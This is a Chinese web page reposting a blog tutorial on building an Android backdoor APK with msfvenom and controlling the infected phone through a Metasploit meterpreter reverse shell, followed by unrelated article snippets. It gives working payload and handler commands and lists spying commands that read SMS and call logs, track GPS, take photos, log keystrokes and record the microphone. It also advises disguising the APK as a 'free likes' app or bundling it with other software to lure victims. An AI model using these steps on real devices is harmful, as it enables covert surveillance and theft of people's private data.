百摩网
当前位置: 首页 生活百科

kalilinux入侵windows7(Linux利用MSF入侵安卓手机)

时间:2023-08-16 作者: 小编 阅读量: 4 栏目名: 生活百科

MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

前言

最近整理了一些奇安信&华为&深信服大佬的课件资料 大厂面试课题,想要的可以私信自取,无偿赠送给粉丝朋友~

一、什么是msf

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。

MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

演示环境

使用Kali 2021.3进行演示操作目标靶机: 模拟器逍遥 Android 7.1.2软件:msfvenom、msfconsole(Kali系统内置)

二、渗透流程1.进入管理员模式

命令: sudo su解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令

提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可

2.生成可执行木马文件

命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk

实例: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk

解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址

本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性

文件名可以随便写自己喜欢的名字,比如写免费刷赞,可能更容易让目标主机上钩

这个就是Kali主机的IP地址

接下来运行命令生成木马

默认生成的文件在根目录下

把刚才生成的安卓后门放到目标靶机中去

3.运行msfconsole命令

命令: msfconsole

4.配置参数

(1)命令: use exploit/multi/handler(选择模块)

(2)命令: set payload android/meterpreter/reverse_tcp(选择攻击模块)

(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)

(4)命令: set lport 5555(填写刚才生成文件时的端口号)

(5)命令: show options(查看设置参数)

(6)命令: exploit -z -j(后台执行)

参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行

详细攻击配置参数演示:

现在等待靶机打开APP就可以了

5.在靶机打开可执行文件

我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令: sessions(查看上钩的用户)(2)命令: sessions -i 1(选择需要攻击的用户)

出现meterpreter你就已经成功的入侵成功

三、meterpreter入侵安卓手机命令1.查看对方手机系统信息

命令: sysinfo

2.查看对方手机安装哪些app文件

命令: app_list

3.远程控制对方手机拍摄一张照片

命令: webcam_snap

4.远程控制对方手机开起视频聊天

命令: webcam_chat

5.实时查看对方手机的信息

命令: dump_sms

6.获取对方手机的通讯录

命令: dump_calllog

7.实时获取对方手机GPS定位

命令: geolocate

8.更多命令

还可以查看帮助文档,命令help

cmd指令:

cat 读取文件内容到屏幕

cd 更改目录

checksum 检索文件的校验和

cp 将源复制到目标

del 删除指定文件

dir 列出文件(ls 的别名)

下载 下载文件或目录

编辑 编辑文件

getlwd 打印本地工作目录

getwd 打印工作目录

lcd 更改本地工作目录

lls 列出本地文件

lpwd 打印本地工作目录

ls 列出文件

mkdir 创建目录

mv 将源移动到目标

pwd 打印工作目录

rm 删除指定文件

rmdir 删除目录

search 搜索文件

show_mount 列出所有挂载点/逻辑驱动器

upload 上传文件或目录

pkill 按名称终止进程

meterpreter命令:

keyscan_start 开始捕获击键(开始键盘记录)

keyscan_dump 转储按键缓冲(下载键盘记录)

keyscan_stop 停止捕获击键(停止键盘记录)

record_mic X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat 开始视频聊天(视频,对方会有弹窗)

webcam_list 单摄像头(查看摄像头列表)

webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)

enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)

getdesktop 得到当前的Meterpreter桌面

reboot 重新启动远程计算机

shutdown 关闭远程计算机

shell 放入系统命令 shell

enumdesktops 列出所有可访问的桌面和窗口站

getdesktop 获取当前的meterpreter桌面

idletime 返回远程用户空闲的秒数

keyboard_send 发送击键

keyevent 发送按键事件

keyscan_dump 转储击键缓冲区

keyscan_start 开始捕获击键

keyscan_stop 停止捕获击键

mouse 发送鼠标事件

screenshare 实时观看远程用户桌面

screenshot 抓取交互式桌面的屏幕截图

setdesktop 更改 Meterpreters 当前桌面

uictl 控制一些用户界面组件

record_mic 从默认麦克风录制音频 X 秒

webcam_chat 开始视频聊天

webcam_list 列出网络摄像头

webcam_snap 从指定的网络摄像头拍摄快照

webcam_stream 播放来自指定网络摄像头的视频流

play 在目标系统上播放波形音频文件 (.wav)

getsystem 尝试将您的权限提升到本地系统的权限

execute -f notepad 打开记事本

把文件上传到靶机命令

把文件下载到主机命令

版权声明:本文为CSDN博主「HonkerG」的原创文章

原文链接:https://blog.csdn.net/RFZ_322/article/details/124277545

    推荐阅读
  • 无机可乘的意思和造句(词语无机可乘的意思和造句)

    下面希望有你要的答案,我们一起来看看吧!无机可乘的意思和造句无机可乘,汉语成语,拼音是wújīkěchéng,意思是没有空子可钻。造句丁杰的摔法无机可乘,只得以拳脚相搏,这一来便落了下风,脸上身上被连连击中。但在无机可乘的时候,他这种飘忽不定的掌力,对方要借力也无从借起。母兽们很及时的将幼兽围了起来,这样我是无机可乘的。

  • 警惕七种常见荨麻疹过敏原 急性荨麻疹常见过敏原

    精神因素及内分泌的改变精神紧张、感情冲动、月经、绝经、妊娠等。油煎、油炸或是辛辣类的食物较易引发体内的热性反应的食物少吃。了解了上述七种常见的荨麻疹过敏原,希望您可以在平时的时候注意远离这些过敏源,如果是必须要接触的话,也建议您一定要做好防护措施。

  • 松鼠尾巴的作用,尾巴比身体还大(松鼠的尾巴很大有什么作用)

    五、交际工具1、松鼠摆动尾巴的频率变化,是它们互相交流时的语言。

  • 蛇能活多长时间?(蛇最长能活多久)

    神秘的“长江走蛟”事件1998年长江流域发生了一次特大洪水灾害,此次灾难波及了全国29个省份,受灾面积达到了3.18亿亩,2.23亿人口受到影响,直接经济损失达到了1660亿元。98年长江洪灾的主要原因是从当年6月份起,沿岸地区就开始接连降下暴雨,使得长江流量迅速增加,很快就超过了安全警戒线。只能说到目前为止,并没有任何证据能够证明龙是真实存在的,蛇也只是一种普通的爬行动物,并不会变成蛟龙。

  • 盛唐幻夜结局是什么(该剧讲述了什么)

    盛唐幻夜结局是什么《盛唐幻夜》结局穆乐死了,而叶远安与赵澜之等人又踏上了新的征程。《盛唐幻夜》是由华策影视、北京自由酷鲸影业出品,周晓鹏执导,缪娟编剧,吴倩、郑业成、张雨剑、董琦等主演的古装探案魔幻剧。该剧讲述了盛唐之下,在繁华的洛阳不断发生蹊跷的案件,叶远安、穆乐、赵澜之、明慧郡主等人围绕一件件扑朔迷离、错综复杂的悬疑案件寻踪觅源、屡破奇案,在破案过程中斗智斗勇并找到真爱的一系列爱恨纠葛的故事。

  • 这一天过得真快作文(这一天过得真快作文范文)

    但往往我们会因心情的不同而感受到时间或长或短,并且收获了不同的人生。清晨,我睁开双眼,在盼望与期待中迎来了新的太阳。推开房门,早餐已躺在盘子里,时不时地向我问好,我和妈妈尽情地享用这美味的佳肴。晚上,我回到家中,以最快的速度完成了作业。这不代表每天要过着日复一日的生活,平淡无奇。

  • 怎样能让男生腿瘦下来(适合男生的瘦腿方法)

    怎样能让男生腿瘦下来?下面内容希望能帮助到你,我们来一起看看吧!快速跑,男生的体质总体来说要比女性的好,而我们建议男生应该多做强度大的运动,比如跑步的时候稍微的加快速度,这样的话,运动的强度上升了,运动的效果也是会变好的,而快速跑是高强度的跑步,我们建议应该多进行。

  • 广州2020长隆万圣节主题演出时间是几点?

    五大鬼蜮临世10月9日长隆拉开“玩圣节”序幕,明日之城、异次元界、南瓜欢乐小镇、暗黑城、魔域,五大风格迥异的鬼域在夜晚正式开启,各式各样的“鬼”开始出没:明日之城中丧尸成群出行,寻找新鲜的血肉。十大鬼王上演恐怖之夜在十大鬼王的控制之下,五大鬼域恐怖指数升级。同在暗黑城的恶灵凶宅以神秘吸引着众多冒险者的到来,但他们无一例外都失去了踪迹,你会是下一个勇敢到来的冒险者吗?

  • 养殖石榴花的小技巧(养殖石榴花的小技巧介绍)

    养殖石榴花的小技巧选择品种石榴花的品种也是非常多的,且每样的观赏价值都比较高,一般我们常见的有粉红甜石榴、玛瑙石榴、白花石榴等。病虫防治石榴花也是比较容易发生病虫害的,比如干腐病、煤污病;当发生这种病害的时候,我们需要将一些病枝条剪下并烧毁,然后在选用一些对症的农药进行喷洒捕杀。

  • 渡己渡人什么意思(渡人渡己)

    渡人渡己美国南方某州,每年都举办南瓜优种大赛,有一个农夫经常获头奖他得奖之后,总是毫不吝惜地将得奖的种子送给街坊邻居有人问他:“你的奖项来之不易,投入了大量的时间和精力做品种改良,为什么却这么慷慨地将种子送。